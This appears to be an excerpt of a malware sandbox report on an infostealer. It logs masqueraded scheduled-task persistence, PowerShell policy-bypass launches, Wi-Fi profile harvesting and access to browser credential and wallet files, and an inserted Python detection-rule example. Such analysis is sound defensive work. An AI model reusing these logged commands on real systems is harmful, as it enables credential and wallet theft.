Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\udwnme.exe "C:\Users\user\AppData\Local\Temp\udwnme.exe"
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\luglzv.exe "C:\Users\user\AppData\Local\Temp\luglzv.exe"
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\fq%
Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTefq@IF
Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerTefq KF
Source: svchost.exe, 00000007.00000002.2919350933.0000000003464000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\fq

                    Language, Device and Operating System Detection

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Queries volume information: C:\Users\user\Desktop\zrrHgsDzgS.exe VolumeInformation
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\udwnme.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\luglzv.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: zrrHgsDzgS.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: udwnme.exe, 0000000F.00000002.2935712753.000000000560E000.00000004.00000020.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2937611618.000000000573D000.00000004.00000020.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2932822508.0000000004FA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

Source: Yara match | File source: 7.2.svchost.exe.7450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.436ff90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.7450000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.436ff90.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2934826064.0000000007450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: Yara match | File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum#\Electrum\wallets
Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
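The two evidence groups above (the `cmd.exe /C chcp 65001 && netsh wlan show profile | findstr All` chain spawned from a binary in the user's Temp directory, and a non-browser process opening Chrome, Edge and Firefox credential/history databases) are the kind of thing a detection engineer turns into rules. The Python below is an added example, not code from the report or from Joe Sandbox: it encodes both patterns and runs them over events constructed to mirror the report's "process created" and "file opened" lines, plus two constructed benign controls. The event schema (`parent_image`, `image`, `command_line`, `target_file`) is an assumed Sysmon-style shape, not a log format taken from the report. The WLAN rule also matches the `key=clear` form, which the report does not show but which is the `netsh` switch that actually reveals a saved passphrase.

```python
import re
from dataclasses import dataclass

# Saved-WLAN-profile enumeration, and the follow-up switch that prints the key in clear.
WLAN_PROFILE_RE = re.compile(r"netsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b", re.IGNORECASE)
WLAN_KEY_RE = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)
USER_TEMP_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Browser profile directories (Chromium and Firefox layouts) and the stores inside them
# that hold credentials, cookies or history.
BROWSER_DIR_RE = re.compile(r"\\(?:User Data\\|Mozilla\\Firefox\\Profiles\\)", re.IGNORECASE)
BROWSER_SECRET_RE = re.compile(
    r"\\(?:Login Data|Web Data|History|cookies\.sqlite|places\.sqlite|logins\.json|key4\.db)$",
    re.IGNORECASE)
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass
class Event:
    kind: str                # "process" (creation) or "file" (open); assumed schema
    image: str               # full path of the acting process
    parent_image: str = ""   # process events: creator of `image`
    command_line: str = ""   # process events: command line of `image`
    target_file: str = ""    # file events: path opened by `image`


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_wlan_harvest(ev: Event):
    """Rule 1: WLAN profile enumeration via netsh. Severity is high when the key is
    requested in clear or when the launching binary lives in a user's Temp directory,
    as udwnme.exe and luglzv.exe do in this report; otherwise medium."""
    if ev.kind != "process" or not WLAN_PROFILE_RE.search(ev.command_line):
        return None
    severity = "medium"
    if WLAN_KEY_RE.search(ev.command_line) or USER_TEMP_RE.search(ev.parent_image):
        severity = "high"
    return ("wlan_profile_harvest", severity, f"{_base(ev.parent_image)} -> {ev.command_line}")


def check_browser_store_access(ev: Event):
    """Rule 2: a process that is not the browser itself opens a browser credential,
    cookie or history database inside a browser profile directory."""
    if ev.kind != "file":
        return None
    if not (BROWSER_DIR_RE.search(ev.target_file) and BROWSER_SECRET_RE.search(ev.target_file)):
        return None
    if _base(ev.image) in BROWSER_IMAGES:
        return None
    return ("browser_store_access", "high", f"{_base(ev.image)} opened {ev.target_file}")


RULES = (check_wlan_harvest, check_browser_store_access)


def evaluate(events):
    """Run every rule over every event; return (rule, severity, evidence) tuples."""
    return [hit for ev in events for rule in RULES if (hit := rule(ev))]


# CONSTRUCTED events mirroring the report's "process created" and "file opened" lines,
# followed by two constructed benign controls that must not fire.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\user\AppData\Local\Temp\udwnme.exe",
          r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'),
    Event("process", r"C:\Windows\SysWOW64\netsh.exe", r"C:\Windows\SysWOW64\cmd.exe",
          "netsh wlan show profile"),
    Event("file", r"C:\Users\user\AppData\Local\Temp\luglzv.exe",
          target_file=r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("file", r"C:\Users\user\AppData\Local\Temp\luglzv.exe",
          target_file=r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"),
    Event("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          target_file=r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("process", r"C:\Windows\System32\netsh.exe", r"C:\Windows\explorer.exe",
          "netsh interface ip show config"),
]

if __name__ == "__main__":
    for name, severity, evidence in evaluate(SAMPLE_EVENTS):
        print(f"[{severity}] {name}: {evidence}")
```

The netsh.exe child event alone only rates medium because its parent is cmd.exe, not the Temp-dir binary; correlating it with the parent cmd.exe event (or walking one more level up the process tree) is what lifts it to high, which is why the rule keys on the command line of cmd.exe as well as on netsh.exe itself.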
Source: Yara match, file source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
